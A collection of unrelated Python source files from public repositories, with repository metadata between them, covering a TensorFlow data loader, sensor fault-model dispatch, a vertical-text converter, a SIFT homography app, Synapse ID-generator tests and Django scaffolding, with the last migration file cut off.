def get_iterator(
self,
process_fn=lambda x: x, shuffle=False,
batch_size=32, epochs=-1, num_threads=4, num_pull=1):
def _parse_data(filename, label):
image_decoded = _load_image(filename)
image_processed = process_fn(image_decoded)
return image_processed, label
images_arr = np.array(self.images)
targets_arr = np.array(self.targets)
if shuffle:
p = np.random.permutation(len(images_arr))
images_arr = images_arr[p]
targets_arr = targets_arr[p]
dataset = tf.data.Dataset.from_tensor_slices((images_arr, targets_arr))
if shuffle:
dataset = dataset.shuffle(buffer_size=10000)
dataset = dataset.map(_parse_data, num_parallel_calls=num_threads)
dataset = dataset.prefetch((num_threads + 1) * batch_size * num_pull)
dataset = dataset.repeat(epochs)
dataset = dataset.batch(batch_size)
dataset = dataset.prefetch(num_pull)
return dataset.make_one_shot_iterator()
def get_inputs(
self,
process_fn=lambda x: x, shuffle=False,
batch_size=32, epochs=-1, num_threads=4, num_pull=1):
return self.get_iterator(
process_fn, shuffle, batch_size, epochs, num_threads, num_pull).get_next()
def get_split(split_name, dataset_dir, file_pattern=None, reader=None):
"""Gets a dataset capable of reading images in <class>/img folder structure.
"""
return DatasetImageFolder(dataset_dir, split=split_name)
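# Minimal usage sketch (TF1-style session; the dataset path and the 224x224
# resize are assumptions -- batching requires images of equal size):
if __name__ == '__main__':
    dataset = DatasetImageFolder('/data/imagenet/val', split='validation')
    images, labels = dataset.get_inputs(
        process_fn=lambda img: tf.image.resize_images(img, [224, 224]),
        batch_size=8, epochs=1)
    with tf.Session() as sess:
        img_batch, label_batch = sess.run([images, labels])
        print(img_batch.shape, label_batch)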
| [
"[email protected]"
] | |
56cfc69b4f0df71f263ce973542e8d0957a0ec87 | 79d2d6388831714560082f44bcb1e029d76a60cb | /ๅๆ/็ฎๆณไบคไบ/health/three_model_rms/utils/model_util.py | 3a4391846dccc45ce1c1542af54be8703e7127d2 | [] | no_license | fishishappyandfree/project_shenzhen | a82393a775b5f91f23ea71538c034ce02420dc7f | 5663416142a64c00f5532f852f72a47986787382 | refs/heads/master | 2020-08-10T11:27:29.855142 | 2019-10-17T07:01:46 | 2019-10-17T07:01:46 | 214,322,318 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,331 | py | # coding=utf-8
from models.MT1_x_feed.run_model_gpu import Model as mt1_x_feed_model
from models.MT2_ae_raw.run_model_gpu import Model as mt2_ae_raw_model
from models.MT2_ae_rms.run_model_gpu import Model as mt2_ae_rms_model
from models.MT2_micphone.run_model_gpu import Model as mt2_micphone_model
from models.MT2_spindle_z.run_model_gpu import Model as mt2_spindle_z_model
from models.MT2_x_feed.run_model_gpu import Model as mt2_x_feed_model
from models.MT2_y_feed.run_model_gpu import Model as mt2_y_feed_model
from models.MT3_micphone.run_model_gpu import Model as mt3_micphone_model
from models.MT3_x_feed.run_model_gpu import Model as mt3_x_feed_model
from models.MT3_y_feed.run_model_gpu import Model as mt3_y_feed_model
from models.TG_x_feed.run_model_gpu import Model as tg_x_feed_model
from models.TG_y_feed.run_model_gpu import Model as tg_y_feed_model
from utils.common_config import get_sensor_checkpoints
"""
Determine the checkpoint path and the model to call from a sensor_id.
"""
class Model_Util(object):
def __init__(self):
# base directory holding the model checkpoints
self.home_path = "/wzs/model/three_model"
self.sensor_model = {
"cDAQ9189-1D71297Mod1/ai3": mt1_x_feed_model(),
"cDAQ9189-1D91958Mod5/ai1": mt2_ae_rms_model(),
"cDAQ9189-1D71297Mod5/ai1": mt2_micphone_model(),
"cDAQ9189-1D71297Mod3/ai2": mt2_spindle_z_model(),
"cDAQ9189-1D71297Mod3/ai3": mt2_x_feed_model(),
"cDAQ9189-1D71297Mod2/ai1": mt2_y_feed_model(),
"cDAQ9189-1D71297Mod5/ai2": mt3_micphone_model(),
"cDAQ9189-1D71297Mod4/ai3": mt3_x_feed_model(),
"cDAQ9189-1D71297Mod2/ai2": mt3_y_feed_model(),
"cDAQ2Mod2/ai3": tg_x_feed_model(),
"cDAQ2Mod3/ai0": tg_y_feed_model()
}
self.checkpoints = get_sensor_checkpoints()["one"]
# inference (test)
def call_model_test(self, sensor_id, data, created):
path, model = self.get_path_and_model(sensor_id)
if path is None or model is None:
return None
else:
path = self.home_path + path
# fault class and the probability predicted for that fault class
#fault_pred_class, show_pro_fault_pred_class, = model.run_test(data, path)
fault_pred_class, show_pro_fault_pred_class, health_percent = model.run_test(data, path)
if fault_pred_class is not None and fault_pred_class != 0:
breakdownData = {}
breakdownData["collectInterFaceNo"] = str(sensor_id)
breakdownData["breakdownType"] = str(fault_pred_class)
breakdownData["percent"] = str(int(show_pro_fault_pred_class * 100))
breakdownData["health"] = str(int(health_percent * 100))
breakdownData["created"] = str(created)
return breakdownData
else:
return None
# training
def call_model_train(self, sensor_id, samples_train, labels_train):
path, model = self.get_path_and_model(sensor_id)
if path is None or model is None:
return None, None
version = model.run_train(samples_train, labels_train, path)
return path, version
def get_path_and_model(self, sensor_id):
path = self.checkpoints.get(sensor_id)
model = self.sensor_model.get(sensor_id)
return path, model
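# Usage sketch (assumes the full model zoo imported above can actually be
# constructed on this machine; the sensor id is one key from self.sensor_model):
if __name__ == '__main__':
    util = Model_Util()
    path, model = util.get_path_and_model("cDAQ9189-1D71297Mod1/ai3")
    print(path, type(model).__name__)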
| [
"[email protected]"
] | |
9871d6ba47aae3ea6f9505b0039828e21640b9bf | 2a2a8f2b3530bcd73f8d982078a8c6b56634cfb3 | /Recognition/venv/Scripts/pasteurize-script.py | 969d0821a08bd6675ef27efc426b96a92941685f | [] | no_license | donghkim714/Smart-Face-Recognition-DoorLock | b7c4a832060c20fd83fe4472e412b0aea8ffeefa | 719d10a19ab651e6b91affb0625acae9eb90fe1a | refs/heads/master | 2022-12-22T01:56:59.467400 | 2020-05-29T07:10:00 | 2020-05-29T07:10:00 | 234,720,732 | 0 | 0 | null | 2022-12-15T23:56:07 | 2020-01-18T10:54:37 | Python | UTF-8 | Python | false | false | 426 | py | #!D:\Document\Phyton\Recognition\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'future==0.18.2','console_scripts','pasteurize'
__requires__ = 'future==0.18.2'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('future==0.18.2', 'console_scripts', 'pasteurize')()
)
| [
"[email protected]"
] | |
aef65d16f2d1a8b3d741801733609eb9fe8b4197 | 88356c3d62d7b9f88107572592899ebb10dc0469 | /tatega.py | 79eda284c5dfcaea1f26f26cd6cdc6a06193db96 | [
"MIT"
] | permissive | p1scescom/tategapy | 7206e7d4ea30c90a85d95ec6d8cc5de5e832d611 | 529cc4f35161ff22c26fcc70a2e9711e815949f2 | refs/heads/master | 2020-12-10T03:25:23.242227 | 2017-06-27T08:16:12 | 2017-06-27T08:16:12 | 95,531,859 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,540 | py | #!/usr/bin/env python
#coding: utf-8
import argparse
import sys
import unicodedata
def zen_han(char):
res = unicodedata.east_asian_width(char)
if res == 'F' or res == 'W':
return True
else:
return False
def make_tategaki(sents, return_len, gyo_h=0):
tategaki_script = []
for i in range(return_len):
for sent in sents:
try:
char = sent[i]
except IndexError:
char = ' '
char = char if zen_han(char) else (' ' + char)
try:
tategaki_script[i] = char + ' ' * gyo_h + tategaki_script[i]
except IndexError:
tategaki_script = tategaki_script + [char]
return tategaki_script
def sentences_len_max(sents):
max = 0
for sent in sents:
leng = len(sent)
if max < leng:
max = leng
return max
def convert_tategaki(*, script='', gyo_h=0,):
sents = script.split('\n')
sent_len_max = sentences_len_max(sents)
tategaki_script = make_tategaki(sents, sent_len_max, gyo_h=gyo_h)
return tategaki_script
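# Example (worked by hand from the logic above): later lines become columns
# further to the left, and half-width characters are padded to full width.
#   convert_tategaki(script='abc\nde')
#   -> [' d a', ' e b', '   c']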
if __name__ == '__main__':
parser = argparse.ArgumentParser(usage='This script converts text to tategaki (vertical writing)',
description='Convert horizontal text into a vertical (tategaki) layout.',
epilog='Please find other good ways to use it.',
add_help=True,)
parser.add_argument("script_file",
nargs = '?',
default=None,
type = str,
help ="set script file",)
parser.add_argument("-gh", "--gyohaba",
type=int,
default=0,
help="gyou haba")
args = parser.parse_args()
if args.script_file is None:
script = ''
try:
script = input()
except EOFError:
pass
while True:
try:
script = script + '\n' + input()
except EOFError:
print('\n'.join(convert_tategaki(script=script, gyo_h=args.gyohaba)))
break
else:
try:
with open(args.script_file,'r') as script_file:
script = ''.join(script_file.readlines()).rstrip()
print('\n'.join(convert_tategaki(script=script, gyo_h=args.gyohaba)))
except FileNotFoundError:
sys.stderr.write('The file is not found.\nPlease set a existing file name.\n')
| [
"[email protected]"
] | |
554ff26433d1e3de8eb9d3d3bc3f4ce6c947a2c7 | bcd4ceb019f605fecafb6b392f025e8f7a3b4874 | /SIFT_app.py | f77c475aceb28dff0da3a10deea4a76371c63342 | [] | no_license | ChristianMalherbe/ENPH353_LAB4 | 08c8db93f53ebe53f1920d037d2d43ffb62bb7ec | 45dcee7a3e0bbb33d20a3fce15ccc9e917a89cfa | refs/heads/master | 2022-12-21T02:32:36.319721 | 2020-10-06T03:34:17 | 2020-10-06T03:34:17 | 301,603,913 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,479 | py | #!/usr/bin/env python
from PyQt5 import QtCore, QtGui, QtWidgets
from python_qt_binding import loadUi
import cv2
import sys
import numpy as np
import time
"""
Author: Christian Malherbe
App for showing the homography between a template image and a video feed.
I don't have a webcam, so I recorded a video and use that recording instead.
"""
class My_App(QtWidgets.QMainWindow):
def __init__(self):
super(My_App, self).__init__()
loadUi("./SIFT_app.ui", self)
self._cam_id = 0
self._cam_fps = 2
self._is_cam_enabled = False
self._is_template_loaded = False
self.browse_button.clicked.connect(self.SLOT_browse_button)
self.toggle_cam_button.clicked.connect(self.SLOT_toggle_camera)
# Timer used to trigger the camera
self._timer = QtCore.QTimer(self)
self._timer.timeout.connect(self.SLOT_query_camera)
self.vid = "/home/fizzer/SIFT_app/Robot Video.mp4"
self.VidCap = cv2.VideoCapture(self.vid)
self.ImgPath = "/home/fizzer/SIFT_app/000_image.jpg"
def SLOT_browse_button(self):
dlg = QtWidgets.QFileDialog()
dlg.setFileMode(QtWidgets.QFileDialog.ExistingFile)
if dlg.exec_():
self.template_path = dlg.selectedFiles()[0]
pixmap = QtGui.QPixmap(self.template_path)
#This is the image
self.template_label.setPixmap(pixmap)
print("Loaded template image file: " + self.template_path)
# Source: stackoverflow.com/questions/34232632/
def convert_cv_to_pixmap(self, cv_img):
cv_img = cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB)
height, width, channel = cv_img.shape
bytesPerLine = channel * width
q_img = QtGui.QImage(cv_img.data, width, height,
bytesPerLine, QtGui.QImage.Format_RGB888)
return QtGui.QPixmap.fromImage(q_img)
def SLOT_query_camera(self):
#Reference image, in grey scale
img = cv2.imread(self.ImgPath,cv2.IMREAD_GRAYSCALE)
# Create a sift object for using SIFT related functions
sift = cv2.xfeatures2d.SIFT_create()
#Get the keypoints and descriptors of the robot image
kp_image, desc_image = sift.detectAndCompute(img, None)
# Feature matching
index_params = dict(algorithm=0, trees=5)
search_params = dict()
flann = cv2.FlannBasedMatcher(index_params, search_params)
self.VidCap.set(3, 320)
self.VidCap.set(4, 240)
#Read frames of the recorded video
val,frame = self.VidCap.read()
"""Frame must be resized"""
wid = int(frame.shape[1]* 1/3)
hei = int(frame.shape[0]* 1/3)
dimensions = (wid,hei)
frame = cv2.resize(frame,dimensions,interpolation = cv2.INTER_AREA)
print(frame.size)
grayframe = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) # trainimage
kp_grayframe, desc_grayframe = sift.detectAndCompute(grayframe, None)
matches = flann.knnMatch(desc_image, desc_grayframe, k=2)
good_points = []
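# Lowe's ratio test: keep a match only if the best descriptor distance is
# clearly smaller than the second best (0.6 here; 0.7-0.8 is the usual range).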
for m, n in matches:
if m.distance < 0.6 * n.distance:
good_points.append(m)
if(len(good_points) > 10):
query_pts = np.float32([kp_image[m.queryIdx].pt for m in good_points]).reshape(-1, 1, 2)
print(query_pts)
train_pts = np.float32([kp_grayframe[m.trainIdx].pt for m in good_points]).reshape(-1, 1, 2)
print(train_pts)
matrix, mask = cv2.findHomography(query_pts, train_pts, cv2.RANSAC, 5.0)
matches_mask = mask.ravel().tolist()
# Perspective transform
h, w = img.shape
pts = np.float32([[0, 0], [0, h], [w, h], [w, 0]]).reshape(-1, 1, 2)
dst = cv2.perspectiveTransform(pts, matrix)
homography = cv2.polylines(frame, [np.int32(dst)], True, (255, 0, 0), 3)
pixmap = self.convert_cv_to_pixmap(frame)
self.live_image_label.setPixmap(pixmap)
else:
self.live_image_label.setPixmap(self.convert_cv_to_pixmap(frame))
def SLOT_toggle_camera(self):
""" Open the video at the specified location. """
if self._is_cam_enabled:
self._timer.stop()
self._is_cam_enabled = False
self.toggle_cam_button.setText("&Enable camera")
else:
self._timer.start()
self._is_cam_enabled = True
self.toggle_cam_button.setText("&Disable camera")
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
myApp = My_App()
myApp.show()
sys.exit(app.exec_())
| [
"[email protected]"
] | |
aa550b9d70afa052455b756486553b52339601ec | 7c73569deb98d61728139893d3cb08496b667fc6 | /manage.py | 44b6a2ce62816229580a063df9273b4e6b391f6d | [] | no_license | creationyun/CrawlingRules | b9969699614d40bd5372bbd9f92bdb5740d3aeaa | 79ff145d291f07986445cedb0bc17240155d6576 | refs/heads/master | 2021-01-13T22:10:43.737755 | 2020-10-11T17:12:26 | 2020-10-11T17:12:26 | 242,510,259 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 633 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'CrawlingRules.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
87dcadbf061948de9f9af6d8d77364e0cfe6eaad | e22aed3aebfcb02801b854585a7327f33a94aa28 | /tests/storage/test_id_generators.py | f0a8e32f1eaf3de7b0791d5fc27b5e79c7cf49a3 | [
"Apache-2.0"
] | permissive | sea87321/synapse | 769fff0f893cf662878afe3f85ade089578512d5 | ab903e7337f6c2c7cfcdac69b13dedf67e56d801 | refs/heads/master | 2022-12-28T21:21:40.988005 | 2020-09-24T15:35:31 | 2020-09-24T15:35:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,050 | py | # -*- coding: utf-8 -*-
# Copyright 2020 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from synapse.storage.database import DatabasePool
from synapse.storage.util.id_generators import MultiWriterIdGenerator
from tests.unittest import HomeserverTestCase
from tests.utils import USE_POSTGRES_FOR_TESTS
class MultiWriterIdGeneratorTestCase(HomeserverTestCase):
if not USE_POSTGRES_FOR_TESTS:
skip = "Requires Postgres"
def prepare(self, reactor, clock, hs):
self.store = hs.get_datastore()
self.db_pool = self.store.db_pool # type: DatabasePool
self.get_success(self.db_pool.runInteraction("_setup_db", self._setup_db))
def _setup_db(self, txn):
txn.execute("CREATE SEQUENCE foobar_seq")
txn.execute(
"""
CREATE TABLE foobar (
stream_id BIGINT NOT NULL,
instance_name TEXT NOT NULL,
data TEXT
);
"""
)
def _create_id_generator(self, instance_name="master") -> MultiWriterIdGenerator:
def _create(conn):
return MultiWriterIdGenerator(
conn,
self.db_pool,
instance_name=instance_name,
table="foobar",
instance_column="instance_name",
id_column="stream_id",
sequence_name="foobar_seq",
)
return self.get_success(self.db_pool.runWithConnection(_create))
def _insert_rows(self, instance_name: str, number: int):
"""Insert N rows as the given instance, inserting with stream IDs pulled
from the postgres sequence.
"""
def _insert(txn):
for _ in range(number):
txn.execute(
"INSERT INTO foobar VALUES (nextval('foobar_seq'), ?)",
(instance_name,),
)
self.get_success(self.db_pool.runInteraction("_insert_rows", _insert))
def _insert_row_with_id(self, instance_name: str, stream_id: int):
"""Insert one row as the given instance with given stream_id, updating
the postgres sequence position to match.
"""
def _insert(txn):
txn.execute(
"INSERT INTO foobar VALUES (?, ?)", (stream_id, instance_name,),
)
txn.execute("SELECT setval('foobar_seq', ?)", (stream_id,))
self.get_success(self.db_pool.runInteraction("_insert_row_with_id", _insert))
def test_empty(self):
"""Test an ID generator against an empty database gives sensible
current positions.
"""
id_gen = self._create_id_generator()
# The table is empty so we expect an empty map for positions
self.assertEqual(id_gen.get_positions(), {})
def test_single_instance(self):
"""Test that reads and writes from a single process are handled
correctly.
"""
# Prefill table with 7 rows written by 'master'
self._insert_rows("master", 7)
id_gen = self._create_id_generator()
self.assertEqual(id_gen.get_positions(), {"master": 7})
self.assertEqual(id_gen.get_current_token_for_writer("master"), 7)
# Try allocating a new ID gen and check that we only see position
# advanced after we leave the context manager.
async def _get_next_async():
with await id_gen.get_next() as stream_id:
self.assertEqual(stream_id, 8)
self.assertEqual(id_gen.get_positions(), {"master": 7})
self.assertEqual(id_gen.get_current_token_for_writer("master"), 7)
self.get_success(_get_next_async())
self.assertEqual(id_gen.get_positions(), {"master": 8})
self.assertEqual(id_gen.get_current_token_for_writer("master"), 8)
def test_multi_instance(self):
"""Test that reads and writes from multiple processes are handled
correctly.
"""
self._insert_rows("first", 3)
self._insert_rows("second", 4)
first_id_gen = self._create_id_generator("first")
second_id_gen = self._create_id_generator("second")
self.assertEqual(first_id_gen.get_positions(), {"first": 3, "second": 7})
self.assertEqual(first_id_gen.get_current_token_for_writer("first"), 3)
self.assertEqual(first_id_gen.get_current_token_for_writer("second"), 7)
# Try allocating a new ID gen and check that we only see position
# advanced after we leave the context manager.
async def _get_next_async():
with await first_id_gen.get_next() as stream_id:
self.assertEqual(stream_id, 8)
self.assertEqual(
first_id_gen.get_positions(), {"first": 3, "second": 7}
)
self.get_success(_get_next_async())
self.assertEqual(first_id_gen.get_positions(), {"first": 8, "second": 7})
# However the ID gen on the second instance won't have seen the update
self.assertEqual(second_id_gen.get_positions(), {"first": 3, "second": 7})
# ... but calling `get_next` on the second instance should give a unique
# stream ID
async def _get_next_async():
with await second_id_gen.get_next() as stream_id:
self.assertEqual(stream_id, 9)
self.assertEqual(
second_id_gen.get_positions(), {"first": 3, "second": 7}
)
self.get_success(_get_next_async())
self.assertEqual(second_id_gen.get_positions(), {"first": 3, "second": 9})
# If the second ID gen gets told about the first, it correctly updates
second_id_gen.advance("first", 8)
self.assertEqual(second_id_gen.get_positions(), {"first": 8, "second": 9})
def test_get_next_txn(self):
"""Test that the `get_next_txn` function works correctly.
"""
# Prefill table with 7 rows written by 'master'
self._insert_rows("master", 7)
id_gen = self._create_id_generator()
self.assertEqual(id_gen.get_positions(), {"master": 7})
self.assertEqual(id_gen.get_current_token_for_writer("master"), 7)
# Try allocating a new ID gen and check that we only see position
# advanced after we leave the context manager.
def _get_next_txn(txn):
stream_id = id_gen.get_next_txn(txn)
self.assertEqual(stream_id, 8)
self.assertEqual(id_gen.get_positions(), {"master": 7})
self.assertEqual(id_gen.get_current_token_for_writer("master"), 7)
self.get_success(self.db_pool.runInteraction("test", _get_next_txn))
self.assertEqual(id_gen.get_positions(), {"master": 8})
self.assertEqual(id_gen.get_current_token_for_writer("master"), 8)
def test_get_persisted_upto_position(self):
"""Test that `get_persisted_upto_position` correctly tracks updates to
positions.
"""
# The following tests are a bit cheeky in that we notify about new
# positions via `advance` without *actually* advancing the postgres
# sequence.
self._insert_row_with_id("first", 3)
self._insert_row_with_id("second", 5)
id_gen = self._create_id_generator("first")
self.assertEqual(id_gen.get_positions(), {"first": 3, "second": 5})
# Min is 3 and there is a gap between 5, so we expect it to be 3.
self.assertEqual(id_gen.get_persisted_upto_position(), 3)
# We advance "first" straight to 6. Min is now 5 but there is no gap so
# we expect it to be 6
id_gen.advance("first", 6)
self.assertEqual(id_gen.get_persisted_upto_position(), 6)
# No gap, so we expect 7.
id_gen.advance("second", 7)
self.assertEqual(id_gen.get_persisted_upto_position(), 7)
# We haven't seen 8 yet, so we expect 7 still.
id_gen.advance("second", 9)
self.assertEqual(id_gen.get_persisted_upto_position(), 7)
        # Now that we've seen 7, 8 and 9 we can go straight to 9.
id_gen.advance("first", 8)
self.assertEqual(id_gen.get_persisted_upto_position(), 9)
# Jump forward with gaps. The minimum is 11, even though we haven't seen
# 10 we know that everything before 11 must be persisted.
id_gen.advance("first", 11)
id_gen.advance("second", 15)
self.assertEqual(id_gen.get_persisted_upto_position(), 11)
def test_get_persisted_upto_position_get_next(self):
"""Test that `get_persisted_upto_position` correctly tracks updates to
positions when `get_next` is called.
"""
self._insert_row_with_id("first", 3)
self._insert_row_with_id("second", 5)
id_gen = self._create_id_generator("first")
self.assertEqual(id_gen.get_positions(), {"first": 3, "second": 5})
self.assertEqual(id_gen.get_persisted_upto_position(), 3)
with self.get_success(id_gen.get_next()) as stream_id:
self.assertEqual(stream_id, 6)
self.assertEqual(id_gen.get_persisted_upto_position(), 3)
self.assertEqual(id_gen.get_persisted_upto_position(), 6)
# We assume that so long as `get_next` does correctly advance the
# `persisted_upto_position` in this case, then it will be correct in the
# other cases that are tested above (since they'll hit the same code).
class BackwardsMultiWriterIdGeneratorTestCase(HomeserverTestCase):
"""Tests MultiWriterIdGenerator that produce *negative* stream IDs.
"""
if not USE_POSTGRES_FOR_TESTS:
skip = "Requires Postgres"
def prepare(self, reactor, clock, hs):
self.store = hs.get_datastore()
self.db_pool = self.store.db_pool # type: DatabasePool
self.get_success(self.db_pool.runInteraction("_setup_db", self._setup_db))
def _setup_db(self, txn):
txn.execute("CREATE SEQUENCE foobar_seq")
txn.execute(
"""
CREATE TABLE foobar (
stream_id BIGINT NOT NULL,
instance_name TEXT NOT NULL,
data TEXT
);
"""
)
def _create_id_generator(self, instance_name="master") -> MultiWriterIdGenerator:
def _create(conn):
return MultiWriterIdGenerator(
conn,
self.db_pool,
instance_name=instance_name,
table="foobar",
instance_column="instance_name",
id_column="stream_id",
sequence_name="foobar_seq",
positive=False,
)
return self.get_success(self.db_pool.runWithConnection(_create))
def _insert_row(self, instance_name: str, stream_id: int):
"""Insert one row as the given instance with given stream_id.
"""
def _insert(txn):
txn.execute(
"INSERT INTO foobar VALUES (?, ?)", (stream_id, instance_name,),
)
self.get_success(self.db_pool.runInteraction("_insert_row", _insert))
def test_single_instance(self):
"""Test that reads and writes from a single process are handled
correctly.
"""
id_gen = self._create_id_generator()
with self.get_success(id_gen.get_next()) as stream_id:
self._insert_row("master", stream_id)
self.assertEqual(id_gen.get_positions(), {"master": -1})
self.assertEqual(id_gen.get_current_token_for_writer("master"), -1)
self.assertEqual(id_gen.get_persisted_upto_position(), -1)
with self.get_success(id_gen.get_next_mult(3)) as stream_ids:
for stream_id in stream_ids:
self._insert_row("master", stream_id)
self.assertEqual(id_gen.get_positions(), {"master": -4})
self.assertEqual(id_gen.get_current_token_for_writer("master"), -4)
self.assertEqual(id_gen.get_persisted_upto_position(), -4)
# Test loading from DB by creating a second ID gen
second_id_gen = self._create_id_generator()
self.assertEqual(second_id_gen.get_positions(), {"master": -4})
self.assertEqual(second_id_gen.get_current_token_for_writer("master"), -4)
self.assertEqual(second_id_gen.get_persisted_upto_position(), -4)
def test_multiple_instance(self):
"""Tests that having multiple instances that get advanced over
        federation works correctly.
"""
id_gen_1 = self._create_id_generator("first")
id_gen_2 = self._create_id_generator("second")
with self.get_success(id_gen_1.get_next()) as stream_id:
self._insert_row("first", stream_id)
id_gen_2.advance("first", stream_id)
self.assertEqual(id_gen_1.get_positions(), {"first": -1})
self.assertEqual(id_gen_2.get_positions(), {"first": -1})
self.assertEqual(id_gen_1.get_persisted_upto_position(), -1)
self.assertEqual(id_gen_2.get_persisted_upto_position(), -1)
with self.get_success(id_gen_2.get_next()) as stream_id:
self._insert_row("second", stream_id)
id_gen_1.advance("second", stream_id)
self.assertEqual(id_gen_1.get_positions(), {"first": -1, "second": -2})
self.assertEqual(id_gen_2.get_positions(), {"first": -1, "second": -2})
self.assertEqual(id_gen_1.get_persisted_upto_position(), -2)
self.assertEqual(id_gen_2.get_persisted_upto_position(), -2)
| [
"[email protected]"
] | |
4e272faf6e60d70565198c3dde769e3ee4de92da | 86a84cf4c1e285d92c084d6eaf0e0219e5b997fe | /join function.py | 5c9826f36ecb9c6cbea254e0cc861d8c3a1d01ef | [] | no_license | Ayush181005/Intermediate-and-Advance-Python | 225e2b0d9f4643351e256c1fad3840bab08f0e61 | 93e352c5fc04513c4f5e65d773d33ffccf5b146b | refs/heads/master | 2023-08-05T23:51:19.274574 | 2021-09-26T10:47:58 | 2021-09-26T10:47:58 | 410,524,129 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 235 | py | sampleList = ['chalk', 'duster', 'board', 'pen']
# => chalk and duster and board and pen
for item in sampleList:
if item != 'pen':
print(item + " and ", end="")
else:
print(item)
print(' and '.join(sampleList)) | [
"[email protected]"
] | |
b578b6bd112d8de72c4bfad24d739dfeea7db7e6 | 91a7fad1c423c57dc04084820c91d29e2013848c | /blog/migrations/0022_resumedocument.py | 351f11fa81361e786e03d7fb3ad4cf058bc6d213 | [] | no_license | connorgillis/ProjectsPortfolio | d9c317e4663a3bff48fe5879b5d2189c1ea3712f | d599b22fac7bad93fc3434e393ec866ce61b6fff | refs/heads/master | 2022-12-12T10:32:35.624564 | 2020-09-10T19:43:23 | 2020-09-10T19:43:23 | 294,500,799 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,116 | py | # Generated by Django 2.2.9 on 2020-02-08 00:09
from django.db import migrations, models
import django.db.models.deletion
import modelcluster.fields
class Migration(migrations.Migration):
dependencies = [
('wagtaildocs', '0010_document_file_hash'),
('wagtailcore', '0041_group_collection_permissions_verbose_name_plural'),
('blog', '0021_auto_20200201_2016'),
]
operations = [
migrations.CreateModel(
name='ResumeDocument',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('categories', modelcluster.fields.ParentalManyToManyField(blank=True, to='blog.ResumeCategory')),
('doc', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtaildocs.Document')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
]
| [
"[email protected]"
] | |
5ef91587ec64fa984660640df2ba412f8602d443 | b8eb666c8b6fe4610d87bff8048f4a95a1c5b549 | /ๆต่ฏ/UI่ชๅจๅ/ๆต่ฏๅทฅๅท__Appium/Project/bin/case_generate.py | 14e7209b8c867671ecf5c98ccdcb17f472a73948 | [] | no_license | cainiaosun/study | 1e983e404005e537410b205634a27cee974faba0 | 91df9b63cda1839b7fc60de3b5f1eb19ccc33a1f | refs/heads/master | 2020-05-30T09:59:19.749099 | 2019-11-22T10:39:12 | 2019-11-22T10:39:12 | 189,641,828 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,083 | py | # Create executable unittest cases
import sys
sys.path.append("..")
from util.case_excel_deal import DataTable
def GenerateCase(path):
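    # Writes autocase.py: one generated test_<n> method per case listed in
    # runningcase.xls; each method replays that case's step rows through
    # unittest_main at runtime.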
file=path+"/autocase.py"
with open(file,"w") as fp:
fp.write("""
import sys
sys.path.append("../")
from util.case_excel_deal import DataTable
from util.write_log import Log
import unittest_main
class AutoCase(unittest_main.mukewang):""")
case_list=DataTable(path+"/runningcase.xls").case_list()
for i in range(0,len(case_list)):
testid=str(i).rjust(5,"0")
fp.write("""
def test_"""+testid+"""(self):
        Log().info("Execute Case:test"+str(\""""+testid+"""\"))
index=int("""+str(i)+""")
case_list=DataTable("Case_ID",path+"/runningcase.xls").case_list()
col_values=DataTable("Case_ID",path=path+"/runningcase.xls").col_values
start=col_values.index(case_list[index])
count=col_values.count(case_list[index])
end=start+count
Log().info("Case Name:"+DataTable("Case_ID",path=path+"/runningcase.xls").value)
for i in range(start,end):
self.crete_step(i)
""")
#fp.close()
if __name__=="__main__":
GenerateCase(".") | [
"[email protected]"
] | |
dcbe08a694faaa04b472a28a23fa0a38a1b0ef93 | a903599d1b2e570a19ac2caffffa1445f17a44c4 | /app/cms/migrations/0002_auto_20181009_1455.py | f2622cc7403e7752e1aefd9b4b2ba17ba04c2643 | [
"MIT"
] | permissive | wdr-data/wdrforyou-cms | d1d482e41fd5ed2d75ae3b96abb49aa6f56be7f5 | 1260ef30ad17669caccb0f3b2aade984facef4b2 | refs/heads/master | 2022-12-12T14:52:23.106496 | 2020-06-06T17:21:42 | 2020-06-06T17:21:42 | 152,069,052 | 0 | 0 | MIT | 2022-12-08T03:12:57 | 2018-10-08T11:30:40 | Python | UTF-8 | Python | false | false | 1,579 | py | # Generated by Django 2.1.2 on 2018-10-09 14:55
from enum import Enum
import cms.models.translations
from django.db import migrations, models
import django.db.models.deletion
class Language(Enum):
ARABIC = 'arabic'
PERSIAN = 'persian'
ENGLISH = 'english'
class Migration(migrations.Migration):
dependencies = [
('cms', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='ReportTranslation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
